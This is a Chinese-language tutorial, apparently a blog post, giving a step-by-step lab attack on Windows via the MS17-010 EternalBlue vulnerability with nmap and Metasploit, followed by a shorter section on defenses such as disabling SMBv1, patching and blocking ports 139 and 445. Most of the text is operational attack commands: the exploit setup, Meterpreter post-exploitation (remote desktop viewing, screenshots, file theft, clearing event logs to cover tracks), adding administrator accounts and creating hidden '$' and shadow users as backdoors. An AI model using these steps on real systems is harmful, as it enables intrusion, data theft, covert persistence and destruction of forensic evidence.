目录

一、进入目标主机的电脑代码:

二、Meterpreter 核⼼操作(常⽤命令)

三、核⼼管理命令(CMD 命令⾏)

四、安全后⻔:隐藏⽤户与影⼦⽤户

五、漏洞防御策(针对 MS17-010)

1. 禁⽤ SMBv1 协议(漏洞载体) 

2. 安装安全补丁

3. 防⽕墙端⼝管控 

4. 终端防护强化


一、进入目标主机的电脑代码

  1. nmap --script smb-vuln* 192.168.203.134
  2. msfconsole
  3. search ms17-010 # 搜索相关模块
  4. use exploit/windows/smb/ms17_010_eternalblue # 选择永恒之蓝利⽤模块(输⼊对应序号也可)
  5. show options # 查看需要配置的参数
  6. set rhosts 192.168.203.134 # 设置⽬标机 IP
  7. set lhost 192.168.203.129 # 设置攻击机 IP(Kali 本机 IP)
  8. Exploit // run

二、Meterpreter 核⼼操作(常⽤命令

命令

功能描述

Run vnc

(实时观看目标主机桌面)

shell

获取⽬标机 CMD 命令⾏(进入目标机Windows CMD界面

chcp 65001

解决中⽂乱码

ps

查看⽬标机所有运⾏进程

screenshot

截取⽬标机当前屏幕(图⽚保存⾄ Kali 本地)

clearev

清除⽬标机系统⽇志(掩盖攻击痕迹)

getuid

查看当前获取的⽤户权限

Download ⽬标⽂件路径 本地保存路径

下载⽬标机⽂件到 Kali

upload  本地⽂件路径 ⽬标机保存路径

上传 Kali ⽂件到⽬标机

三、核⼼管理命令(CMD 命令⾏

命令

功能描述

示例

net user

查看系统中所有⽤户账户

net user

net user ⽤户名

查看指定⽤户的详细信息

net user admin

net user ⽤户名 密码 /ad

d

创建新⽤户

net user test 123456 /

add

net user ⽤户名

/delete

删除⽤户

net user test /delete

net localgroup 组名 ⽤

户名 /add

将⽤户添加到指定组(提升权

限)

net localgroup adminis

trators test /add (将

test 加⼊管理员组)

net localgroup

查看系统中所有⽤户组

net localgroup

四、安全后⻔:隐藏⽤户与影⼦⽤户

创建命令: net user gaga$ 123456 /add (⽤户名后加 $ ,默认不在"计算机管理"和 ne t user 列表中显示)

影⼦⽤户(注册表隐藏,难排查),可能后期会持续检测计算机状态

排查建议:同时检查「计算机管理→本地⽤户和组」和注册表 SAM\Domains\Account\Users

\Names 路径,对⽐异常数值名称与⽤户的对应关系

五、漏洞防御策(针对 MS17-010)

1. 禁⽤ SMBv1 协议(漏洞载体) 

⽅法:控制⾯板→程序→程序和功能→启⽤或关闭 Windows 功能→取消勾选「SMB 1.0/CIFS

⽂件共享⽀持」→「确定」

2. 安装安全补丁

通过 Windows Update ⾃动更新,或⼿动下载 MS17-010 对应补丁

(KB4012212/KB4012215 等,根据系统版本选择)

3. 防⽕墙端⼝管控 

阻⽌ TCP 139、445 端⼝的⼊站和出站连接(企业内⽹可根据业务需求配置 IP ⽩名单,仅允

许授权设备访问)

4. 终端防护强化

不打开陌⽣邮件附件、不点击可疑链接

启⽤ Windows Defender 或安装第三⽅杀毒软件,保持病毒库更新

Logo

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐